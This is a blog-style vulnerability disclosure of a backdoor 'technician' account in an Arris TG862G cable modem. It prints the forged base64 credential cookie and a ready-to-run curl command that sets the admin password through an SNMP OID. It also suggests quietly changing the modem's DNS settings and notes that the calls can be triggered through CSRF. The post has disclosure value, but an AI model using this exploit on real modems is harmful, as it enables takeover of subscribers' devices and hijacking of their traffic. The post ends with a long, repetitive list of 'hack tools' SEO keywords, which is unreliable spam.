Arris Cable Modem Backdoor - I'm A Technician, Trust Me.

Vendor backdoors are the worst. Sloppy coding leading to unintentional "bugdoors" is somewhat defendable, but flat out backdoors are always unacceptable. Todays example is brought to you by Arris. A great quote from their site -

Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.

Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version -TS070563_092012_MODEL_862_GW

After successfully providing the correct login and password to the modems administration page, the following cookie is set (client side):

Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9

 All requests must have a valid "credential" cookie set (this was not the case in a previous FW release - whoops) if the cookie is not present the modem will reply with "PLEASE LOGIN". The cookie value is just a base64 encoded json object:

{"valid":true,"technician":false,"credential":"YWRtaW46cGFzc3dvcmQ=","primaryOnly":false,"access":{"ALL":true},"name":"admin"}

And after base64 decoding the "credential" value we get:

{"valid":true,"technician":false,"credential":"admin:password","primaryOnly":false,"access":{"ALL":true},"name":"admin"}

Sweet, the device is sending your credentials on every authenticated request (without HTTPS), essentially they have created basic-auth 2.0 - As the kids say "YOLO". The part that stuck out to me is the "technician" value that is set to "false" - swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following worked wonderfully:

Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9

Which decodes to the following:

{"credential":"dGVjaG5pY2lhbjo="}

And finally:

{"credential":"technician:"} 

Awesome, the username is "technician" and the password is empty. Trying to log into the interface using these credentials does not work :(

That is fairly odd. I can't think of a reasonable reason for a hidden account that is unable to log into the UI. So what exactly can you do with this account? Well, the web application is basically a html/js wrapper to some CGI that gets/sets SNMP values on the modem. It is worth noting that on previous FW revisions the CGI calls did NOT require any authentication and could be called without providing a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.

Now we can resurrect the ability to set/get SNMP values by setting our "technician" account:

That's neat, but we would much rather be using the a fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded unix admin. Taking a look at the password change functionality appeared to be a dead end as it requires the previous password to set a new one:

Surprisingly the application does check the value of the old password too! Back to digging around the following was observed in the "mib.js" file:

SysCfg.AdminPassword= new Scalar("AdminPassword","1.3.6.1.4.1.4115.1.20.1.1.5.1",4);

Appears that the OID "1.3.6.1.4.1.4115.1.20.1.1.5.1" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up with nothing:

HTTP/1.1 200 OK
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55
{
"1.3.6.1.4.1.4115.1.20.1.1.5.1.0":"",
"1":"Finish"
}

What about setting a new value? Surely that will not work....

That response looks hopeful. We can now log in with the password "krad_password" for the "admin" user:

This functionality can be wrapped up in the following curl command:

curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'

Of course if you change the password you wouldn't be very sneaky, a better approach would be re-configuring the modems DNS settings perhaps? It's also worth noting that the SNMP set/get is CSRF'able if you were to catch a user who had recently logged into their modem.

The real pain here is that Arris keeps their FW locked up tightly and only allows Cable operators to download revisions/fixes/updates, so you are at the mercy of your Cable operator, even if Arris decides that its worth the time and effort to patch this bug backdoor - you as the end user CANNOT update your device because the interface doesn't provide that functionality to you! Next level engineering.


Read more

1. Hack Tools
2. Hack Tools Online
3. How To Hack
4. Hacker Tools Hardware
5. Hacker Tools 2020
6. Growth Hacker Tools
7. Hacking Tools Windows 10
8. Hacker Tools Free
9. Growth Hacker Tools
10. Hack App
11. Hacking Tools Windows
12. Pentest Tools Find Subdomains
13. Tools Used For Hacking
14. Hacking Tools 2020
15. Tools Used For Hacking
16. Hacker Tools Online
17. Hacker Tools For Windows
18. Hacker Tools Apk Download
19. Hacker Tools Linux
20. Pentest Tools Framework
21. Pentest Tools Download
22. Hackers Toolbox
23. Hack Tool Apk No Root
24. Beginner Hacker Tools
25. Pentest Tools
26. Hacking Tools Github
27. Nsa Hack Tools Download
28. Ethical Hacker Tools
29. Hacker Tools For Mac
30. Computer Hacker
31. Android Hack Tools Github
32. Pentest Tools For Mac
33. Hacking Tools Pc
34. Hacker Tools List
35. Usb Pentest Tools
36. Hacking Tools For Kali Linux
37. Nsa Hack Tools
38. New Hacker Tools
39. Hacking Tools For Games
40. Pentest Tools For Android
41. Hacker Search Tools
42. Hack Tools For Windows
43. Hacker Tools For Windows
44. Pentest Tools Alternative
45. Hack Tools For Windows
46. Pentest Tools Apk
47. Hacker Tools Apk
48. Hack Rom Tools
49. New Hack Tools
50. Wifi Hacker Tools For Windows
51. Nsa Hack Tools
52. Wifi Hacker Tools For Windows
53. Hack Tools For Windows
54. Pentest Tools Nmap
55. Pentest Tools Review
56. Hackers Toolbox
57. Hacker Search Tools
58. Hacking Tools For Games
59. Pentest Tools Tcp Port Scanner
60. Pentest Tools Apk
61. Hacker Tools Apk Download
62. Hacker Tools For Mac
63. Pentest Tools Free
64. Hacker Techniques Tools And Incident Handling
65. Hacking Tools Online
66. Blackhat Hacker Tools
67. Hacker Tools For Pc
68. Hak5 Tools
69. Install Pentest Tools Ubuntu
70. Hacker Techniques Tools And Incident Handling
71. Growth Hacker Tools
72. Hak5 Tools
73. Pentest Tools For Android
74. New Hacker Tools
75. Hacker
76. Beginner Hacker Tools
77. Pentest Tools Apk
78. Kik Hack Tools
79. Hack Apps
80. Hacker
81. Hacking Tools Free Download
82. Hacker Tools Apk
83. Nsa Hack Tools
84. Pentest Tools Free
85. Physical Pentest Tools
86. Blackhat Hacker Tools
87. Hacking Tools And Software
88. Hacking Tools Pc
89. Bluetooth Hacking Tools Kali
90. Hak5 Tools
91. Nsa Hacker Tools
92. Hacking Tools Software
93. Pentest Tools List
94. Top Pentest Tools
95. Kik Hack Tools
96. Hack App
97. Black Hat Hacker Tools
98. Hacker Tools For Pc
99. Hackers Toolbox
100. Hacker Tools Apk Download
101. Hacker Tool Kit
102. Hacking Tools 2019
103. Hacking Tools For Windows Free Download
104. Hackrf Tools
105. Pentest Tools Linux
106. New Hack Tools
107. Computer Hacker
108. What Is Hacking Tools
109. Pentest Tools Open Source
110. Hacker Tools 2019
111. Pentest Tools Alternative
112. Hackers Toolbox
113. Hacking Tools Windows 10
114. Pentest Tools For Android
115. Bluetooth Hacking Tools Kali
116. Hacking Tools For Kali Linux
117. World No 1 Hacker Software
118. Pentest Tools For Mac
119. Pentest Recon Tools
120. Hacking Tools Hardware
121. Termux Hacking Tools 2019
122. Hacking Apps
123. Pentest Automation Tools
124. Top Pentest Tools
125. Hacker Tools 2020
126. Hack Tools Mac
127. Pentest Tools Review
128. Hacking Tools For Mac
129. Pentest Tools Nmap
130. Pentest Tools Github
131. What Are Hacking Tools
132. New Hack Tools
133. Hacker Tools Free
134. World No 1 Hacker Software
135. Hacking Tools
136. What Are Hacking Tools
137. Hacking Tools Download
138. Hacker Tools Online
139. Hacking Tools Download
140. Hack Tools For Mac
141. Hackrf Tools
142. Hacking Tools Hardware
143. Black Hat Hacker Tools
144. Pentest Tools For Windows
145. Pentest Tools Subdomain
146. Tools For Hacker
147. Hacker Tools List
148. Pentest Tools Nmap
149. Hack Apps
150. Tools Used For Hacking
151. Hacker Tools For Pc
152. Pentest Tools Framework
153. Hacking Tools For Beginners
154. Pentest Tools Windows
155. Hack Tool Apk No Root
156. Hacking Tools Software
157. Pentest Tools Bluekeep
158. Hack Tool Apk No Root
159. Github Hacking Tools
160. Pentest Tools Framework